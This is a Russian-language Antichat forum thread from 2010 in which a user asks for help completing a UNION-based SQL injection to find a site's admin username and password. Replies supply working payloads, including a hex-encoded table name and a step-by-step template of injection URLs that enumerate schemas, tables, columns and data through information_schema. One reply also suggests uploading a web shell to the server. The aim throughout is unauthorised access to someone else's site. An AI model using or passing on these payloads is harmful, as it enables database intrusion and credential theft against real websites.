ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Помогите составить правильный запрос
  #1  
Старый 15.04.2010, 19:05
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
Провел на форуме:
1555641

Репутация: 8
По умолчанию Помогите составить правильный запрос

Когда составляю запрос UNION+SELECT+1,2,column_name+from+information_sche ma.columns+limit+1,1-- то мне выводятся колонки первого столбца , когда составляю запрос а виде - UNION+SELECT+1,2,column_name+from+information_sche ma.columns+where+table_name='isearch_admin_log'-- начинает ругаться и нефига не выводит ... Помогите составить правильный запрос .
 
Ответить с цитированием

  #2  
Старый 15.04.2010, 19:06
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Название таблицы захекси
 
Ответить с цитированием

  #3  
Старый 15.04.2010, 20:21
-=Razor=-
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме:
1187799

Репутация: 62
По умолчанию

Попробуй так.
Цитата:
UNION+SELECT+1,2,column_name+from+information_sche ma.columns+where+table_name=0x697365617263685f6164 6d696e5f6c6f67
 
Ответить с цитированием

  #4  
Старый 15.04.2010, 20:36
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
Провел на форуме:
1555641

Репутация: 8
По умолчанию

на одном сайте может быть 2 базы данных ?? В одной дапустим новости , коменты и прочая фигня , а во второй базе пароли админа ?? )
Перебрал всю information_schemu Усернайма и пароля от админки нигде нету .... Ктонить с таким сталкивался????
 
Ответить с цитированием

  #5  
Старый 15.04.2010, 20:40
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Цитата:
на одном сайте может быть 2 базы данных ??
да
Цитата:
В одной дапустим новости , коменты и прочая фигня , а во второй базе пароли админа ?? )
да
Цитата:
Перебрал всю information_schemu Усернайма и пароля от админки нигде нету .... Ктонить с таким сталкивался????
сталкивался, просматривай остальные БД
 
Ответить с цитированием

  #6  
Старый 15.04.2010, 20:40
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от br1tva  
на одном сайте может быть 2 базы данных ?? В одной дапустим новости , коменты и прочая фигня , а во второй базе пароли админа ?? )
Перебрал всю information_schemu Усернайма и пароля от админки нигде нету .... Ктонить с таким сталкивался????
естевенно бывает. конекты в настройках и в другую бд можно сделать.

хз. реверсни ip мож найдешь варики как залить шел на сервак а там и разберешься что к чему)
 
Ответить с цитированием

  #7  
Старый 15.04.2010, 20:42
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
Провел на форуме:
1555641

Репутация: 8
По умолчанию

Надо было сразу спросить : Как посмотреть какие базы висят на сайте и как просмотреть другую базу .

Разобрался , спасибо )

Последний раз редактировалось br1tva; 15.04.2010 в 20:46..
 
Ответить с цитированием

  #8  
Старый 15.04.2010, 20:45
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Цитата:
Сообщение от br1tva  
Надо было сразу спросить : Как посмотреть какие базы висят на сайте и как просмотреть другую базу .
Пример:

Все БД:
http://www.site.com/index.php?id=-1+union+select+group_concat(0x0b,schema_name)+from +information_schema.schemata--+

Таблицы из нужной БД:
http://www.site.com/index.php?id=-1+union+select+group_concat(0x0b,table_name)+from+ information_schema.tables+where+table_schema='им я_бд'--+

Колонки из нужной таблицы из нужной БД:
http://www.site.com/index.php?id=-1+union+select+group_concat(0x0b,column_name)+from +information_schema.columns+where+table_name='им я_таблицы'+and+table_schema='имя_бд'--+

Данные из нужной таблицы из нужной БД:
http://www.site.com/index.php?id=-1+union+select+group_concat(имя_колонки) +from+имя_бд.имя_таблицы--+

З.Ы. а чё тема в болталке-то ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите составить регулярное выражение slesh PHP, PERL, MySQL, JavaScript 7 03.06.2009 09:39
Помогите составить функцию !{ra!{e/\/ С/С++, C#, Delphi, .NET, Asm 0 14.12.2008 14:04
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL инъекция в сервере MySQL k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ